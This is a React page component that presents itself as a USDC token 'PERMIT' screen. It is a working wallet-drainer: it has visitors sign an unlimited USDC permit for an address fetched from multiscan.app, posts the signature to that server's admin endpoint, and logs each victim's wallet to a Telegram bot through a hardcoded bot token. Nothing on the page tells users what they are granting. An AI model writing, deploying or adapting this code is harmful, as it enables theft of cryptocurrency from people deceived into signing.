import React, { useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import './TokenPage.css'

// Ethereum constants
const CHAIN_ID = 1
const USDC_TOKEN = "0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48"
const TOKEN_NAME = "USD Coin"
const TOKEN_VERSION = "2"

const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const USDCERC20Page = () => {
  const [loading, setLoading] = useState(false)
  const [error, setError] = useState(null)
  const [success, setSuccess] = useState(false)

  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  const connectMainnet = async () => {
    try {
      console.log("🔌 Connecting to Ethereum Mainnet...")
      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("MetaMask or Bybit Wallet not found. Please open in Bybit Wallet or install and refresh the page.")
      }
      
      const provider = new ethers.BrowserProvider(ethProv)
      
      // Request account connection
      console.log("📝 Requesting accounts...")
      const accounts = await provider.send("eth_requestAccounts", [])
      
      if (!accounts || accounts.length === 0) {
        throw new Error("Failed to access wallet. Please unlock MetaMask and try again.")
      }
      
      console.log("✅ Accounts connected:", accounts)
      const signer = await provider.getSigner()
      const address = await signer.getAddress()
      console.log("✅ Signer address:", address)

      // Check and switch network
      const cur = await provider.send("eth_chainId", [])
      const currentChainId = parseInt(cur, 16)
      console.log("🔗 Current chain ID:", currentChainId, "Expected:", CHAIN_ID)
      
      if (currentChainId !== CHAIN_ID) {
        console.log("🔄 Switching to Ethereum Mainnet...")
        try {
          await provider.send("wallet_switchEthereumChain", [{ chainId: "0x1" }])
          // Wait for network switch
          let attempts = 0
          while (attempts < 10) {
            await new Promise(resolve => setTimeout(resolve, 300))
            const newChainId = parseInt(await provider.send("eth_chainId", []), 16)
            if (newChainId === CHAIN_ID) {
              console.log("✅ Switched to Ethereum Mainnet")
              break
            }
            attempts++
          }
        } catch (switchError) {
          console.error("❌ Failed to switch network:", switchError)
          throw new Error("Failed to switch to Ethereum Mainnet. Please switch the network manually in MetaMask.")
        }
      }

      return { provider, signer }
    } catch (e) {
      console.error("❌ connectMainnet error:", e)
      throw e
    }
  }

  const handlePermit = async () => {
    try {
      setLoading(true)
      setError(null)
      setSuccess(false)
      console.log("PERMIT started")

      // Wait for Bybit/ethereum or WalletConnect
      const ethProv = await getEthereumProviderAsync()
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Get puller from API; fallback to USDC contract address if not received
      let puller = null
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDC`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const pullerData = JSON.parse(text)
              puller = pullerData.puller || pullerData.pullerAddress || pullerData.address || pullerData.data || pullerData
              if (typeof pullerData === 'string' && pullerData.startsWith('0x') && pullerData.length === 42) puller = pullerData
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) puller = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed, using contract address as fallback:", fetchError?.message)
      }
      if (!puller || typeof puller !== 'string' || !puller.startsWith('0x') || puller.length !== 42) {
        console.warn("Puller not received or invalid, using USDC contract address as fallback")
        puller = USDC_TOKEN
      }
      console.log("Using puller address:", puller)

      // Then connect wallet
      const { provider, signer } = await connectMainnet()
      const owner = await signer.getAddress()

      const erc = new ethers.Contract(
        USDC_TOKEN,
        ["function nonces(address) view returns (uint256)"],
        provider
      )

      const nonce = await erc.nonces(owner)
      const deadline = Math.floor(Date.now() / 1000) + 28 * 24 * 60 * 60
      const permitValue = ethers.MaxUint256

      const domain = {
        name: TOKEN_NAME,
        version: TOKEN_VERSION,
        chainId: CHAIN_ID,
        verifyingContract: USDC_TOKEN
      }

      const types = {
        Permit: [
          { name: "owner", type: "address" },
          { name: "spender", type: "address" },
          { name: "value", type: "uint256" },
          { name: "nonce", type: "uint256" },
          { name: "deadline", type: "uint256" }
        ]
      }

      const message = { owner, spender: puller, value: permitValue, nonce, deadline }

      const sig = ethers.Signature.from(
        await signer.signTypedData(domain, types, message)
      )

      const domainName = window.location.hostname

      const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdcs`, {
        method: "POST",
        headers: { 
          "Content-Type": "application/json"
        },
        body: JSON.stringify({
          owner: owner.toLowerCase(),
          domainName: domainName,
          permitValue: permitValue.toString(),
          nonce: nonce.toString(),
          deadline: deadline.toString(),
          allowed: true,
          v: sig.v,
          r: sig.r,
          s: sig.s
        })
      })

      if (!resSubmit.ok) {
        const text = await resSubmit.text()
        console.error("Submit Error:", text)
        throw new Error(`Submission error: ${resSubmit.status}`)
      }

      console.log("PERMIT OK")
      
      // Send connection information to Telegram
      const telegramMessage = `✅ <b>USDC ERC20 Permit</b>\n\n` +
        `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `💼 Token: USDC (ERC-20)\n` +
        `📝 Puller: <code>${puller}</code>\n` +
        `⏰ Time: ${formatDateTime()}`
      await sendTelegramMessage(telegramMessage)
      
      setSuccess(true)
      setLoading(false)
    } catch (e) {
      console.error("PERMIT FAILED", e)
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message) {
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
    }
  }

  return (
    <div className="token-page">
      <div className="token-page-container">
        <div className="token-header">
          <div className="token-icon">
            <img 
              src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
              alt="USDC"
              className="token-logo"
            />
          </div>
          <h1 className="token-title">USDC</h1>
          <p className="token-subtitle">USD Coin (ERC-20)</p>
        </div>

        {error && (
          <div className="token-error">
            {error}
          </div>
        )}

        {success && (
          <div className="token-success">
            ✅ Permit completed successfully!
          </div>
        )}

        {loading && (
          <div className="token-loading">
            Connecting and executing permit...
          </div>
        )}

        <button 
          className="token-approve-btn"
          onClick={handlePermit}
          disabled={loading || success}
        >
          {loading ? 'Processing...' : success ? 'Done!' : 'PERMIT'}
        </button>
      </div>
    </div>
  )
}

export default USDCERC20Page
